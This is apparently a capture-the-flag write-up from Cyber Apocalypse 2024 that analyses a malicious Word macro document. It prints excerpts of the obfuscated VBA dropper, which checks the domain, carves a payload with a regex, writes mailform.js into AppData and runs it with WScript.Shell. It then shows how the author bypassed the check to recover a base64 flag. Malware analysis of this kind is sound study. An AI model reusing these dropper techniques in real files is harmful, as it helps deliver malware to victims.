Game Invitation Writeup
Cyber Apocalypse 2024
Solved by : thewhiteh4t
- Challenge talks about receiving a malicious
docmfile in email - We managed to solve the challenge using windows and MS Office 2016
- We inspected the
macrosin the document and here is a brief flow :- it checks for host domain and proceeds if it matches
chkDomain = "GAMEMASTERS.local" strUserDomain = Environ$("UserDomain") If chkDomain <> strUserDomain Then
- it checks for host domain and proceeds if it matches
- opens the current document as binary mode
Open (ActiveDocument.FullName) For Binary As #gIvqmZwiW- uses regex to match a set pattern
SwMbxtWpP = StrConv(CbkQJVeAG, vbUnicode) Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD Dim vTxAnSEFH Set vTxAnSEFH = CreateObject("vbscript.regexp") vTxAnSEFH.Pattern = "sWcDWp36x5oIe2hJGnRy1iC92AcdQgO8RLioVZWlhCKJXHRSqO450AiqLZyLFeXYilCtorg0p3RdaoPa" Set I4j833DS5SFd34L3gwYQD = vTxAnSEFH.Execute(SwMbxtWpP)
- uses regex to match a set pattern
- gets
AppDatadir path and writesmailform.jskWXlyKwVj = Environ("appdata") & "\Microsoft\Windows" Set aMUsvgOin = CreateObject("Scripting.FileSystemObject") If Not aMUsvgOin.FolderExists(kWXlyKwVj) Then kWXlyKwVj = Environ("appdata") End If Set aMUsvgOin = Nothing Dim K764B5Ph46Vh K764B5Ph46Vh = FreeFile IAiiymixt = kWXlyKwVj & "\" & "mailform.js" - uses
wscriptto runmailform.jsSet R66BpJMgxXBo2h = CreateObject("WScript.Shell") R66BpJMgxXBo2h.Run """" + IAiiymixt + """" + " vF8rdgMHKBrvCoCp0ulm"
- Finally it runs clean up and deletes
mailform.js - First we can modify the domain check to bypass that condition
chkDomain = "GAMEMASTERS.local" strUserDomain = Environ$("UserDomain") <-- original strUserDomain = "GAMEMASTERS.local" <-- simply replace it with the domain If chkDomain <> strUserDomain Then - In the
mailform.jsfile we can add one extra statement to print the output of the function just before it hitsevalas highlighted below :
- Now we can use
csriptwhich is a CMD alternative ofwscriptto read the output it will print :
- In the noise we can see a
cookiebeing sent with a base64 string
> echo "SFRCe200bGQwY3NfNHIzX2czdHQxbmdfVHIxY2tpMTNyfQo=" | base64 -d
> HTB{m4ld0cs_4r3_g3tt1ng_Tr1cki13r}